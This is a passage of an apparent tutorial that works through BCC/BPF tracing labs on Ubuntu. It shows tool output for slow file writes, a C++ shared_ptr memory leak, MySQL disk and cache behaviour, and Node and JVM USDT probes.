0.002295000 jbd2/vda1-8 173 vda W 1609760 4096 1.01
0.023569000 logger 2120 vda W 3235144 4096 1.06
0.024656000 jbd2/vda1-8 173 vda W 1609768 8192 1.05
0.025822000 jbd2/vda1-8 173 vda W 1609784 4096 1.07
0.037940000 logger 2121 vda W 3217408 1048576 9.31
0.039198000 jbd2/vda1-8 173 vda W 1609792 8192 1.16
0.040218000 jbd2/vda1-8 173 vda W 1609808 4096 0.92
</code></pre></div></div>
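<p>The slow samples line up with the occasional 1 MB write. Filtering biosnoop-style rows for latency outliers is a one-liner (sketch; rows are (comm, bytes, lat_ms) tuples taken from the output above):</p>

```python
def slow_ios(rows, threshold_ms=5.0):
    """rows: (comm, bytes, lat_ms) tuples; return the ones over the threshold."""
    return [r for r in rows if r[2] > threshold_ms]

rows = [("logger", 4096, 1.06), ("jbd2/vda1-8", 8192, 1.05),
        ("logger", 1048576, 9.31)]
print(slow_ios(rows))  # only the 1 MB logger write
```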
<p>fileslower makes the cause obvious: the slow operations are the 1 MB flushes to flush.data, far bigger than the usual 1024-byte writes to log.data.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/bcc/tools# ./fileslower.py 1
Tracing sync read/writes slower than 1 ms
TIME(s) COMM TID D BYTES LAT(ms) FILENAME
0.027 logger 1182 W 1024 3.79 log.data
0.055 logger 1182 W 1024 8.35 log.data
0.079 logger 1182 W 1024 3.62 log.data
0.103 logger 1182 W 1024 3.81 log.data
0.126 logger 1182 W 1024 3.71 log.data
0.150 logger 1182 W 1024 3.67 log.data
0.174 logger 1182 W 1024 3.68 log.data
0.198 logger 1182 W 1024 3.97 log.data
0.219 logger 1183 W 1048576 13.95 flush.data
0.222 logger 1182 W 1024 3.78 log.data
0.245 logger 1182 W 1024 3.54 log.data
0.269 logger 1182 W 1024 3.55 log.data
0.293 logger 1182 W 1024 3.76 log.data
0.317 logger 1182 W 1024 3.89 log.data
0.341 logger 1182 W 1024 3.85 log.data
0.364 logger 1182 W 1024 3.49 log.data
0.389 logger 1182 W 1024 4.96 log.data
0.413 logger 1182 W 1024 3.90 log.data
0.431 logger 1183 W 1048576 12.00 flush.data
</code></pre></div></div>
<h2 id="5"> 5. Using BPF Tools: Chasing a Memory Leak</h2>
<p>In this lab, the BPF tool memleak is used to track down a program's memory leak.</p>
<p>Compile and run the program, then feed it file names to count; htop shows wordcount's memory usage growing steadily.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> g++ -fno-omit-frame-pointer -std=c++11 -g wordcount.cc -o wordcount
</code></pre></div></div>
<p>Use memleak to check for leaks:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools/old# ./memleak -p $(pidof wordcount)
</code></pre></div></div>
<p>By default memleak prints, every 5 seconds, the allocations that have not yet been freed:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> [18:15:21] Top 10 stacks with outstanding allocations:
[18:15:36] Top 10 stacks with outstanding allocations:
34 bytes in 2 allocations from stack
[unknown]
35 bytes in 2 allocations from stack
[unknown]
[unknown]
64 bytes in 2 allocations from stack
std::allocator_traits<std::allocator<std::_Sp_counted_ptr_inplace<input_reader, std::allocator<input_reader>, (__gnu_cxx::_Lock_policy)2> > >::allocate(std::allocator<std::_Sp_counted_ptr_inplace<input_reader, std::allocator<input_reader>, (__gnu_cxx::_Lock_policy)2> >&, unsigned long)+0x28
std::__allocated_ptr<std::allocator<std::_Sp_counted_ptr_inplace<input_reader, std::allocator<input_reader>, (__gnu_cxx::_Lock_policy)2> > > std::__allocate_guarded<std::allocator<std::_Sp_counted_ptr_inplace<input_reader, std::allocator<input_reader>, (__gnu_cxx::_Lock_policy)2> > >(std::allocator<std::_Sp_counted_ptr_inplace<input_reader, std::allocator<input_reader>, (__gnu_cxx::_Lock_policy)2> >&)+0x21
std::__shared_count<(__gnu_cxx::_Lock_policy)2>::__shared_count<input_reader, std::allocator<input_reader>>(std::_Sp_make_shared_tag, input_reader*, std::allocator<input_reader> const&)+0x59
std::__shared_ptr<input_reader, (__gnu_cxx::_Lock_policy)2>::__shared_ptr<std::allocator<input_reader>>(std::_Sp_make_shared_tag, std::allocator<input_reader> const&)+0x3c
std::shared_ptr<input_reader>::shared_ptr<std::allocator<input_reader>>(std::_Sp_make_shared_tag, std::allocator<input_reader> const&)+0x28
std::shared_ptr<input_reader> std::allocate_shared<input_reader, std::allocator<input_reader>>(std::allocator<input_reader> const&)+0x37
std::shared_ptr<input_reader> std::make_shared<input_reader>()+0x3b
main+0x3b
__libc_start_main+0xf0
128 bytes in 2 allocations from stack
std::allocator_traits<std::allocator<std::_Sp_counted_ptr_inplace<word_counter, std::allocator<word_counter>, (__gnu_cxx::_Lock_policy)2> > >::allocate(std::allocator<std::_Sp_counted_ptr_inplace<word_counter, std::allocator<word_counter>, (__gnu_cxx::_Lock_policy)2> >&, unsigned long)+0x28
std::__allocated_ptr<std::allocator<std::_Sp_counted_ptr_inplace<word_counter, std::allocator<word_counter>, (__gnu_cxx::_Lock_policy)2> > > std::__allocate_guarded<std::allocator<std::_Sp_counted_ptr_inplace<word_counter, std::allocator<word_counter>, (__gnu_cxx::_Lock_policy)2> > >(std::allocator<std::_Sp_counted_ptr_inplace<word_counter, std::allocator<word_counter>, (__gnu_cxx::_Lock_policy)2> >&)+0x21
std::__shared_count<(__gnu_cxx::_Lock_policy)2>::__shared_count<word_counter, std::allocator<word_counter>, std::shared_ptr<input_reader>&>(std::_Sp_make_shared_tag, word_counter*, std::allocator<word_counter> const&, std::shared_ptr<input_reader>&)+0x5f
std::__shared_ptr<word_counter, (__gnu_cxx::_Lock_policy)2>::__shared_ptr<std::allocator<word_counter>, std::shared_ptr<input_reader>&>(std::_Sp_make_shared_tag, std::allocator<word_counter> const&, std::shared_ptr<input_reader>&)+0x50
std::shared_ptr<word_counter>::shared_ptr<std::allocator<word_counter>, std::shared_ptr<input_reader>&>(std::_Sp_make_shared_tag, std::allocator<word_counter> const&, std::shared_ptr<input_reader>&)+0x3c
std::shared_ptr<word_counter> std::allocate_shared<word_counter, std::allocator<word_counter>, std::shared_ptr<input_reader>&>(std::allocator<word_counter> const&, std::shared_ptr<input_reader>&)+0x4b
_ZSt11make_sharedI12word_counterIRSt10shared_ptrI12input_readerEEES1_IT_EDpOT0_+0x51
main+0x4e
__libc_start_main+0xf0
1767 bytes in 97 allocations from stack
???
4194304 bytes in 1 allocations from stack
std::allocator_traits<std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > >::allocate(std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > >&, unsigned long)+0x28
std::_Vector_base<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > >::_M_allocate(unsigned long)+0x2a
void std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > >::_M_emplace_back_aux<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&>(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)+0x3e
std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > >::push_back(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)+0x69
std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > >::operator=(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)+0x26
std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > > std::__copy_move<false, false, std::input_iterator_tag>::__copy_m<std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > > >(std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > >)+0x52
std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > > std::__copy_move_a<false, std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > > >(std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > >)+0x7d
std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > > std::__copy_move_a2<false, std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > > >(std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > >)+0xb6
std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > > std::copy<std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > > >(std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::istream_iterator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char, std::char_traits<char>, long>, std::back_insert_iterator<std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > >)+0xa8
word_counter::word_count[abi:cxx11]()+0xfc
</code></pre></div></div>
<p>The largest outstanding allocation comes from the copy call inside word_counter::word_count, and the std::shared_ptr in main that points to the word_counter is never released either. That is odd, since a shared_ptr destroys its object automatically when it goes out of scope. Time to look at the code:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int main()
{
bool done = false;
while (!done)
{
auto reader = std::make_shared<input_reader>();
auto counter = std::make_shared<word_counter>(reader);
reader->set_counter(counter);
auto counts = counter->word_count();
done = counter->done();
for (auto const& wc : counts)
{
std::cout << wc.first << " " << wc.second << '\n';
}
}
return 0;
}
</code></pre></div></div>
<p>Now the cause is clear: reader and counter hold circular references to each other, so neither input_reader's nor word_counter's destructor can ever run.</p>
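<p>The same trap exists in any reference-counted scheme. A Python analog, where a weak back-reference breaks the cycle just as std::weak_ptr would in the C++ code (names mirror the sample; this is an illustrative sketch, not the workshop's fix):</p>

```python
import weakref

class Reader:
    def set_counter(self, counter):
        # A weak reference back to the owner breaks the cycle,
        # like replacing shared_ptr with weak_ptr in the C++ code.
        self.counter = weakref.ref(counter)

class Counter:
    def __init__(self, reader):
        self.reader = reader  # strong reference, as in the C++ sample

reader = Reader()
counter = Counter(reader)
reader.set_counter(counter)

ref = weakref.ref(counter)
del counter           # with a strong back-reference, this would NOT free it
print(ref() is None)  # True: the Counter was reclaimed immediately
```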
<h2 id="6"> 6. Using BPF Tools: Database and Disk Stats and Stacks </h2>
<p>This lab uses BCC tools to observe disk performance and database query performance.</p>
<h3>Observing MySQL inserts</h3>
<p>First install and start MySQL:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# apt install mysql-server
root@ubuntu1604:~/linux-tracing-workshop# systemctl start mysql
</code></pre></div></div>
<p>After creating a database, run:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# ./data_access.py insert
</code></pre></div></div>
<p>The script above keeps inserting records.</p>
<p>Running biotop shows that mysqld stays fairly busy:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./biotop
10:13:46 loadavg: 1.56 0.62 0.34 1/141 7738
PID COMM D MAJ MIN DISK I/O Kbytes AVGms
173 jbd2/vda1-8 W 253 0 vda 30 180 1.15
7007 mysqld W 253 0 vda 13 52 1.13
6985 mysqld W 253 0 vda 1 16 4.84
6989 mysqld W 253 0 vda 1 16 1.39
</code></pre></div></div>
<p>Inspect the details of individual I/Os:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./biosnoop
TIME(s) COMM PID DISK T SECTOR BYTES LAT(ms)
0.000000000 mysqld 7007 vda W 11881528 4096 1.07
0.001324000 jbd2/vda1-8 173 vda W 1594504 8192 1.29
0.003013000 jbd2/vda1-8 173 vda W 1594520 4096 1.59
0.004724000 mysqld 7007 vda W 11881528 4096 1.06
0.005880000 jbd2/vda1-8 173 vda W 1594528 8192 1.12
0.007384000 jbd2/vda1-8 173 vda W 1594544 4096 1.40
0.009750000 mysqld 7007 vda W 11881528 4096 1.75
0.011242000 jbd2/vda1-8 173 vda W 1594552 8192 1.46
0.012463000 jbd2/vda1-8 173 vda W 1594568 4096 1.09
0.014872000 mysqld 7007 vda W 11881528 4096 1.79
0.015912000 jbd2/vda1-8 173 vda W 1594576 8192 1.01
0.017167000 jbd2/vda1-8 173 vda W 1594592 4096 1.14
0.019677000 mysqld 7007 vda W 11881528 4096 1.84
0.021173000 jbd2/vda1-8 173 vda W 1594600 8192 1.46
0.022514000 jbd2/vda1-8 173 vda W 1594616 4096 1.24
0.024218000 mysqld 7007 vda W 11881528 4096 1.07
0.025966000 jbd2/vda1-8 173 vda W 1594624 8192 1.72
0.027062000 jbd2/vda1-8 173 vda W 1594640 4096 1.00
0.028742000 mysqld 7007 vda W 11881528 4096 1.02
0.029930000 jbd2/vda1-8 173 vda W 1594648 8192 1.15
0.031019000 jbd2/vda1-8 173 vda W 1594664 4096 0.98
0.032752000 mysqld 7007 vda W 11881528 4096 1.06
0.033856000 jbd2/vda1-8 173 vda W 1594672 8192 1.07
0.035294000 jbd2/vda1-8 173 vda W 1594688 4096 1.33
</code></pre></div></div>
<p>Use biolatency to look at the latency distribution:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./biolatency 5
Tracing block device I/O... Hit Ctrl-C to end.
usecs : count distribution
0 -> 1 : 0 | |
2 -> 3 : 0 | |
4 -> 7 : 0 | |
8 -> 15 : 0 | |
16 -> 31 : 0 | |
32 -> 63 : 0 | |
64 -> 127 : 0 | |
128 -> 255 : 0 | |
256 -> 511 : 0 | |
512 -> 1023 : 748 |************ |
1024 -> 2047 : 2425 |****************************************|
2048 -> 4095 : 74 |* |
4096 -> 8191 : 27 | |
8192 -> 16383 : 11 | |
16384 -> 32767 : 2 | |
32768 -> 65535 : 2 | |
usecs : count distribution
0 -> 1 : 0 | |
2 -> 3 : 0 | |
4 -> 7 : 0 | |
8 -> 15 : 0 | |
16 -> 31 : 0 | |
32 -> 63 : 0 | |
64 -> 127 : 0 | |
128 -> 255 : 0 | |
256 -> 511 : 0 | |
512 -> 1023 : 773 |************* |
1024 -> 2047 : 2370 |****************************************|
2048 -> 4095 : 78 |* |
4096 -> 8191 : 34 | |
8192 -> 16383 : 11 | |
16384 -> 32767 : 4 | |
32768 -> 65535 : 1 | |
</code></pre></div></div>
<p>Some I/O latencies are indeed quite high. Let's look at the kernel stacks that submit the I/O (this failed on my Ubuntu 16.04, probably due to kernel build options):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> stackcount -i 10 submit_bio
</code></pre></div></div>
<p>Use fileslower to find slow file operations:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./fileslower 1
Tracing sync read/writes slower than 1 ms
TIME(s) COMM TID D BYTES LAT(ms) FILENAME
5.901 rs:main Q:Reg 459 W 92 1.80 auth.log
6.479 mysqld 7007 W 1024 1.48 ib_logfile0
7.952 mysqld 7007 W 512 2.72 ib_logfile0
14.828 mysqld 7007 W 512 5.28 ib_logfile0
14.843 mysqld 7007 W 8704 2.41 ib_logfile0
19.573 mysqld 7007 W 512 2.84 ib_logfile0
36.177 mysqld 7007 W 512 2.98 ib_logfile0
44.049 mysqld 7007 W 512 1.32 ib_logfile0
45.975 mysqld 7007 W 512 2.69 ib_logfile0
45.992 mysqld 7007 W 512 5.47 ib_logfile0
63.595 mysqld 7007 W 512 1.29 ib_logfile0
</code></pre></div></div>
<p>Use filetop to watch MySQL's file accesses while it inserts rows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ^Croot@ubuntu1604:/usr/share/bcc/tools# ./filetop
Tracing... Output every 1 secs. Hit Ctrl-C to end
10:27:08 loadavg: 1.78 1.61 1.12 1/139 7844
TID COMM READS WRITES R_Kb W_Kb T FILE
7844 clear 2 0 8 0 R xterm
7843 filetop 2 0 2 0 R loadavg
7844 clear 1 0 0 0 R libtinfo.so.5.9
7844 clear 1 0 0 0 R libc-2.23.so
7844 filetop 3 0 0 0 R clear
7844 filetop 2 0 0 0 R ld-2.23.so
7843 filetop 1 0 0 0 R id
7007 mysqld 0 1 0 16 R employees.ibd
7007 mysqld 0 239 0 166 R ib_logfile0
10:27:09 loadavg: 1.78 1.61 1.12 1/139 7845
TID COMM READS WRITES R_Kb W_Kb T FILE
7845 clear 2 0 8 0 R xterm
7843 filetop 2 0 2 0 R loadavg
7845 clear 1 0 0 0 R libtinfo.so.5.9
7845 clear 1 0 0 0 R libc-2.23.so
7845 filetop 3 0 0 0 R clear
7845 filetop 2 0 0 0 R ld-2.23.so
7007 mysqld 0 1 0 16 R employees.ibd
7007 mysqld 0 243 0 168 R ib_logfile0
</code></pre></div></div>
<p>Examine the impact of I/O interrupts on the system:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./hardirqs 1
Tracing hard irq event time... Hit Ctrl-C to end.
HARDIRQ TOTAL_usecs
virtio1-input.0 161
virtio3-req.0 5684
HARDIRQ TOTAL_usecs
virtio0-input.0 2
virtio1-input.0 108
virtio3-req.0 5639
HARDIRQ TOTAL_usecs
virtio1-input.0 145
virtio3-req.0 5678
HARDIRQ TOTAL_usecs
virtio0-input.0 1
virtio1-input.0 134
virtio3-req.0 5891
HARDIRQ TOTAL_usecs
virtio1-input.0 116
virtio3-req.0 5869
</code></pre></div></div>
<h3>Now observing MySQL queries</h3>
<p>Insert data and run selects:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# ./data_access.py insert_once
Inserting employees...
root@ubuntu1604:~/linux-tracing-workshop# ./data_access.py select
Selecting employees...
</code></pre></div></div>
<p>biotop, biolatency, and fileslower all show no slow I/O operations, so presumably the cache hit rate is good.</p>
<p>Start cachestat, then run the selects:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./cachestat 1
HITS MISSES DIRTIES READ_HIT% WRITE_HIT% BUFFERS_MB CACHED_MB
0 0 0 0.0% 0.0% 64 1531
0 0 0 0.0% 0.0% 64 1531
0 0 0 0.0% 0.0% 64 1531
1124 0 0 100.0% 0.0% 64 1531
5 2 3 28.6% 0.0% 64 1531
0 0 0 0.0% 0.0% 64 1531
0 0 0 0.0% 0.0% 64 1531
0 0 0 0.0% 0.0% 64 1531
0 0 0 0.0% 0.0% 64 1531
</code></pre></div></div>
<p>We see reads for a short period and then none, suggesting that MySQL implements its own cache internally.</p>
<p>After dropping the system page cache, we can confirm that not many read operations happen either:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# echo 1 > /proc/sys/vm/drop_caches
root@ubuntu1604:/usr/share/bcc/tools# ./cachestat 1
HITS MISSES DIRTIES READ_HIT% WRITE_HIT% BUFFERS_MB CACHED_MB
0 0 0 0.0% 0.0% 0 88
4 0 0 100.0% 0.0% 0 88
6 5 4 18.2% 18.2% 0 88
0 0 0 0.0% 0.0% 0 88
0 0 0 0.0% 0.0% 0 88
3 0 0 100.0% 0.0% 0 88
0 0 0 0.0% 0.0% 0 88
0 0 0 0.0% 0.0% 0 88
0 0 0 0.0% 0.0% 0 88
</code></pre></div></div>
<h2 id="7"> 7. Using BPF Tools: Node and JVM USDT Probes </h2>
<h3> Node </h3>
<p>Build Node with USDT support; install systemtap-sdt-dev first:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> $ git clone https://github.com/nodejs/node.git
$ cd node
$ git checkout v6.2.1 # or whatever version is currently stable
$ ./configure --prefix=/opt/node --with-dtrace
$ make -j 3
$ sudo make install
</code></pre></div></div>
<p>Use tplist to show Node's USDT probes:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./tplist -l ~/node/node
/root/node/node node:gc__start
/root/node/node node:gc__done
/root/node/node node:net__server__connection
/root/node/node node:net__stream__end
/root/node/node node:http__server__response
/root/node/node node:http__client__response
/root/node/node node:http__client__request
/root/node/node node:http__server__request
</code></pre></div></div>
<p>With node running, we can see even more USDT probes:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./tplist -p $(pidof node)
/lib/x86_64-linux-gnu/libc-2.23.so libc:setjmp
/lib/x86_64-linux-gnu/libc-2.23.so libc:longjmp
/lib/x86_64-linux-gnu/libc-2.23.so libc:longjmp_target
/lib/x86_64-linux-gnu/libc-2.23.so libc:memory_heap_new
/lib/x86_64-linux-gnu/libc-2.23.so libc:memory_arena_reuse_free_list
/lib/x86_64-linux-gnu/libc-2.23.so libc:memory_sbrk_less
/lib/x86_64-linux-gnu/libc-2.23.so libc:memory_arena_reuse_wait
/lib/x86_64-linux-gnu/libc-2.23.so libc:memory_arena_reuse
/lib/x86_64-linux-gnu/libc-2.23.so libc:memory_arena_new
/lib/x86_64-linux-gnu/libc-2.23.so libc:memory_arena_retry
/lib/x86_64-linux-gnu/libc-2.23.so libc:memory_heap_free
/lib/x86_64-linux-gnu/libc-2.23.so libc:memory_heap_less
/lib/x86_64-linux-gnu/libc-2.23.so libc:memory_heap_more
</code></pre></div></div>
<p>Show detailed information about a probe:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./tplist -l ~/node/node -vv '*server__request'
/root/node/node node:http__server__request [sema 0x1c0a034]
location #1 0x1045cf8
argument #1 8 unsigned bytes @ r14
argument #2 8 unsigned bytes @ ax
argument #3 8 unsigned bytes @ *(bp - 4344)
argument #4 4 signed bytes @ *(bp - 4348)
argument #5 8 unsigned bytes @ *(bp - 4304)
argument #6 8 unsigned bytes @ *(bp - 4312)
argument #7 4 signed bytes @ *(bp - 4352)
</code></pre></div></div>
<p>The meaning of each argument is documented in node/src/node.stp:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> probe node_http_server_request = process("node").mark("http__server__request")
{
remote = user_string($arg3);
port = $arg4;
method = user_string($arg5);
url = user_string($arg6);
fd = $arg7;
probestr = sprintf("%s(remote=%s, port=%d, method=%s, url=%s, fd=%d)",
$$name,
remote,
port,
method,
url,
fd);
}
</code></pre></div></div>
<p>Start server.js:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# ~/node/node server.js
</code></pre></div></div>
<p>Start the trace in another terminal:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/bcc/tools# ./trace.py -p $(pidof node) 'u:/opt/node/node:http__server__request "%s %s", arg5, arg6'
</code></pre></div></div>
<p>Send requests from another terminal; arg5 and arg6 are the method and URL respectively:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/node/src# curl localhost:8080
Hello, world!root@ubuntu1604:~/node/src# curl localhost:8080/index.html
Hello, world!root@ubuntu1604:~/node/src# curl 'localhost:8080/login?user=dave&pwd=123'
Hello, world!root@ubuntu1604:~/node/src#
</code></pre></div></div>
<p>The second terminal (running trace) shows the output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/bcc/tools# ./trace.py -p $(pidof node) 'u:/opt/node/node:http__server__request "%s %s", arg5, arg6'
PID TID COMM FUNC -
25022 25022 node http__server__request GET /
25022 25022 node http__server__request GET /index.html
25022 25022 node http__server__request GET /login?user=dave&pwd=123
</code></pre></div></div>
<h3> JVM </h3>
<p>Download the <a href="https://github.com/mpujari/systemtap-tapset-openjdk9">tapset</a>.</p>
<p>List the USDT probes:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/systemtap-tapset-openjdk9# ./create-tapset.sh /usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/
root@ubuntu1604:~/systemtap-tapset-openjdk9/systemtap-tapset# grep -A 10 'probe.*class_loaded' *.stp
hotspot-1.9.0.stp:probe hotspot.class_loaded =
hotspot-1.9.0.stp- process("/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/").mark("class__loaded"),
hotspot-1.9.0.stp- process("/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/").mark("class__loaded")
hotspot-1.9.0.stp-{
hotspot-1.9.0.stp- name = "class_loaded";
hotspot-1.9.0.stp- class = user_string_n($arg1, $arg2);
hotspot-1.9.0.stp- classloader_id = $arg3;
hotspot-1.9.0.stp- is_shared = $arg4;
hotspot-1.9.0.stp- probestr = sprintf("%s(class='%s',classloader_id=0x%x,is_shared=%d)",
hotspot-1.9.0.stp- name, class, classloader_id, is_shared);
hotspot-1.9.0.stp-}
</code></pre></div></div>
<p>Start slowy/App:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# /usr/lib/jvm/java-9-openjdk-amd64/bin/java slowy/App
</code></pre></div></div>
<p>List the process's probes:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/bcc/tools# /usr/lib/jvm/java-9-openjdk-amd64/bin/jps
33757 sun.tools.jps.Jps
33727 App
root@ubuntu1604:~/bcc/tools# ./tplist.py -p 33727 '*class*loaded'
/usr/lib/jvm/java-9-openjdk-amd64/lib/amd64/server/libjvm.so hotspot:class__loaded
/usr/lib/jvm/java-9-openjdk-amd64/lib/amd64/server/libjvm.so hotspot:class__unloaded
root@ubuntu1604:~/bcc/tools#
</code></pre></div></div>
<p>Start tracing:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./trace -p 33727 'u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:class__loaded "%s", arg1'
</code></pre></div></div>
<p>Shut down slowy/App; we can see the trace caught the classes loaded during shutdown:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./trace -p 33727 'u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:class__loaded "%s", arg1'
PID TID COMM FUNC -
33727 33728 java class__loaded java/lang/Shutdown
33727 33728 java class__loaded java/lang/Shutdown$Lock
</code></pre></div></div>
<p>Next, trace the arguments:</p>
